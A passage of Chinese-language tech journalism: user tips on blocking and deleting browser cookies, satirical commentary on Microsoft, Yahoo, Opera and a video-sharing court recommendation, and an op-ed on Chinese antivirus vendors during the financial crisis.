  对于IE 5.0，则到工具菜单中选中因特网选项……选择安全标签，在自定义级别框上点击。将滑块滚动到Cookies，更改各个选项。

  如果你使用的是Netscape，只要在编辑菜单下选中属性，接着在出现的对话框内选中高级，此后按照同样的步骤进行。

  拒收Cookies

  当IE警告你一个cookie正要被下载时，只需在它询问你是否想将之下载时点击否就可以了。或者，你可以选择禁用所有cookie使用，这样浏览器将再不会接收任何cookies了。在Netscape中也是同样如此。

  一旦你打开cookies警告选项，IE对可能cookie的警告将是如此之频繁，甚至会让人觉得吃惊。事实上，频繁的警告十分烦人，不过至少当一个站点窥视你的信息时你会知道，而不是让所有活动都在后台发生。除此之外还能干些什么？

  除了打开cookies警告选项之外，你也可以到Electronic Frontier Foundation (EFF)页面上，成为其中一员，登记请求以尽力阻止广告代理使用cookies 。但是到目前为止，最好的方法还是打开cookie警告选项，设置好浏览器以防侵入，你会觉得惊奇：究竟有多少因特网网站是在为Madison Avenue当雇佣骗子。

  是否还有其他选择？

  通过在一个硬盘驱动器上查找任何含有单词cookie的文件，就可以将cookie文件从计算机上删除。

  你可以将那些文件拖到回收站或垃圾桶中。可是，如果你删除cookie文件，就有可能会丢失一些设置，譬如说你访问站点的密码。在这种情形下，当你访问这些站点时，IE会提醒你重新输入密码。为了防止一些公司将新的cookie文件放到你的硬件中，你可以选择浏览器中的一个选项，该选项可确保每次当外界试图放置cookie时会先询问你的许可。

 

另一个方法是通过专业反病毒软件查杀，例如安天防线2009、Spybot等杀毒软件都有查杀追踪Cookie的功能。

微软专卖店：做店员要身体倍儿棒！

微软最近开始为即将开业的专卖店招募店员，一个令人不解的条件是，微软为每个应聘者设定了体力标准，要求店员应聘者能够抬起或运走70斤左右的重物。微软准备在专卖店中卖什么呢？即使是Xbox 360游戏机或者台式电脑，恐怕也没有70斤这么重。

可一想到微软一直有捆绑销售的传统作风，说不定微软这次在专卖店中也会故技重施，将软件捆绑变为专卖店捆绑销售——买Windows送电脑桌，或者10桶食用油？对于那些力量不足，但又想在微软专卖店工作的应聘者，最佳的选择就是竞争一下专卖店经理的职位了，因为经理只需要抬起50斤就可以了。

看来做微软的销售人员不但要牙好，胃口更好，身体倍儿棒，搬啥都行！

 

雅虎：搜索有仇必报 业务见钱即可

雅虎从微软手中领取了大笔搜索业务合作佣金，本想下一步雅虎就可能和微软的必应成为兄弟了，不过最近雅虎公司副总裁却高调对媒体宣称，雅虎不是必应的一部分，而是竞争对手关系。

原来雅虎与微软达成的只是一个为期10年的搜索技术合作授权协议，并没有涉及到公司业务的合作，因此用户最终看到的仍然是雅虎搜索和必应搜索两个网站。而协议还规定将会有400名雅虎员工被派往微软工作，以具体实施双方的合作计划。

微软当年没有花高价购买雅虎，如今推出自己的搜索引擎后又花小钱通过合作协议公开的用雅虎员工为自己服务，显然占够了雅虎的便宜，也难怪雅虎会在背后有意见。

但是雅虎显然现在还是很在乎钱，最近阿里巴巴将口碑网从雅虎中国中分拆到淘宝网，作为雅虎CEO的巴茨女士竟然没有一点儿意见，反而称赞淘宝赚钱多，看来雅虎在被谷歌和微软这两个最有钱的公司折磨后真是看空了一切，现在只要有钱什么都不是问题。

全是钱闹的。

Windows 7，人人爱预装

在欧盟的词典里，可能微软的发音可能不是微型软件，而是垄断软件。早在几年前欧盟委员会就因微软公司在Windows中捆绑媒体播放器并拒绝向服务器行业竞争对手公开兼容技术信息，与其展开了旷日持久的反垄断较量。在此过程中，微软公司先后被欧盟委员会处以近17亿欧元罚款，并被迫同意发售不附带自身媒体播放器的欧版Windows。

可是上一轮风暴还未过去，又一轮调查接踵而至。由于再次受到欧盟的反垄断调查，微软决定最新的Windows 7欧洲版将割离IE浏览器。微软放下了强硬的姿态却让许多消费者很紧张，对于多数普通用户而言，如果联网之后没有浏览器怎么打开网页？没有办法打开网页怎么获知下载浏览器？这个死循环一样的问题深深的困扰着他们，也开始让部分IE的粉丝呼吁抵制其它浏览器。

发起对微软浏览器反垄断调查的欧洲浏览器厂商Opera似乎也意识到了这个问题，不知道是不是中国的软件预装给了Opera一点灵感，Opera最近发表声明认为最好的解决办法是能够让微软预装多个浏览器，这样就能够给用户更多选择的机会了。

用别人的鸡和窝孵自己的蛋，借着Windows的普及率让所有的用户都可能选择Opera，即便不选择Opera，这样一个出现在Windows上选择也实现了广告效果，Opera的预装算盘如此精明，难怪人人都爱软件预装。

 

分享视频，版权不是强权

Opera想让微软分享个位置给自己，钟爱分享的还有视频分享网站，不过最近北京海淀法院却给广电总局和其他监管部门通发了一个司法建议函，建议取消视频网站的分享模式。理由很简单，因为有盗版。因为存在盗版就取消视频网站的分享模式，无疑是要了视频分享网站的命，但是关闭了视频分享网站，互联网上就没有盗版视频存在了吗？

这种脑袋一拍灵光闪现的解决办法让许多视频网站不寒而栗。法院在维护知识产权方面的心情虽然值得称赞，但是我们并不能因为维护正义而剥夺社会资源。如果按照北京海淀法院的司法建议推理，VCD和DVD都有盗版，是不是国家早点儿就应该关闭所有DVD和VCD生产厂商，没有了DVD、VCD播放机，市面上岂不就没有了盗版？

其实面对盗版问题，政府机构和司法机构应该加强的是相应的监管程序，而非要夸大视频分享这种网络模式对盗版的危害。况且，我国现有的法律条款足以能够达到保护版权者合法权利的目的，如果仅是因为盗版从关盘转移到了网络之中，就动用一刀切的强权措施，这种代价将会是对公众使用网络资源的更大伤害。

对于一个成长中的互联网，对于一个构建中的法治社会，被夸大的危害牺牲的将不只是一种网络共享模式，而是公民对法律的认识。

◎文/苗得雨

    在当下的金融冬天环境中，中国软件行业的日子整体都非常不好过，特别是一些依赖国外订单和为金融相关行业提供解决方案的软件企业，多少都受到了了此次金融风暴的影响。而且随着经济危机的时期延长，相信后期这场风暴会对于国内软件企业带来更大的冲击。

    在国内，国家虽然拍出了4万亿的巨额钞票，但是这些钞票多少能够最终落到国内IT行业，特别是软件行业的口袋里还是未知数，而且根据目前的形势和口风，很多新兴资本市场的投资者已经开始间接将金融风暴的源头归结于互联网和IT产业。他们认为，除了那些拿数字迷惑人的华尔街高智商金融骗子们外，IT产业的众多泡沫企业，也是让投资者的金钱化为乌有的罪魁祸首。

    上述基调的这种声音在美国的民间并不弱，因此估计在未来的一段日子里，那些平日里疯狂追捧科技公司特别是IT产业科技公司的VC大佬和财神们，在IT领域投资时会更加小心与谨慎。

    近几年中国软件行业刚刚呈现复苏，但是这股复苏的暖流多是依靠国内中小企业的近些年的高速成长所带动的，相信有不少中国软件企业是帮助中小企业提供各种解决方案或者ERP之类的服务，养活了自己。但是目前国内中小企业倒闭关门的浪潮已经开始显现，连政府目前都不自信的承认，明年的失业率会有所攀升，所以今后两年对于一些软件企业来说，是一个需要重新定位和找到新的生存方式的磨砺期。

    不过相比其它软件公司，国内的杀毒软件企业似乎就比较自信，TechWeb上一个视频中，瑞星公司的总裁毛一丁就对着镜头跟一群记者说，瑞星的现金储备非常好，过冬不成没问题。瑞星甚至会考虑通过一些手段去蚕食海外市场，准备积极进军海外市场。

    毛一丁的自信来源于杀毒软件稳定的收入来源，而且安全产品是国内目前软件行业中少有的能够依靠正版来存活的。加之政府采购和企业这些大客户，因此中国杀毒软件都活的比较滋润。不过中国杀毒软件在去年也开始遭遇到卡巴斯基等国际杀毒厂商的入侵，原先固守国内市场生态的杀毒厂商一下子遇到了外来的天敌。

    国外杀毒厂商依靠免费和打折扣等策略，迅速攻城略地，让许多国内厂商意识到了危机。现如今全球经济形势又开始转向，因此许多国内杀毒厂商都收回了原来的雄心壮志，开始备战过冬了。虽然固守国内市场是必须，也是最稳妥的策略。

    但是，固守多年国内市场的国内杀毒软件厂商也应该看到，随着国外杀毒软件的强势进入，中国杀毒软件市场迟早会成为一个群雄混战的市场。特别是中国目前成为金融风暴避难所的时候，国际杀毒公司一定会寻找进入中国市场的机遇。如果国内杀毒软件公司在本土市场和国外杀毒公司开战，那些如同卡巴斯基一样不在乎在中国短期盈利的杀毒公司，势必会采取各种对用户的争夺手段，而国内厂商早晚会陷入非常被动的境地。   

    所以，倒不如利用经济寒冬之际，国外许多国家的营销渠道拓展成本降低之时，将部分精力投入到进入国际市场的较量中去。依靠目前还仍然稳固的国内市场，摸索打通走向世界的道路。即便一时短期内无法成功，也能够换取回来宝贵的经验。

    而且中国杀毒软件走出国门也并不是完全没有经验，包括金山、安天防线等几家国内杀毒软件公司，都曾经走出国国门。况且目前在中国市场境内作战的许多国外杀毒软件，也并不是各个都如卡巴斯基般如狼似虎，更多的是如同韩国安博士这样的二线厂商。韩国杀毒软件尚可杀入中国市场，国产杀毒软件也应该有这样的勇气。当然，这个过程中中国杀毒软件厂商也要注意，不要成为马明哲先生那样的“抄底”买家。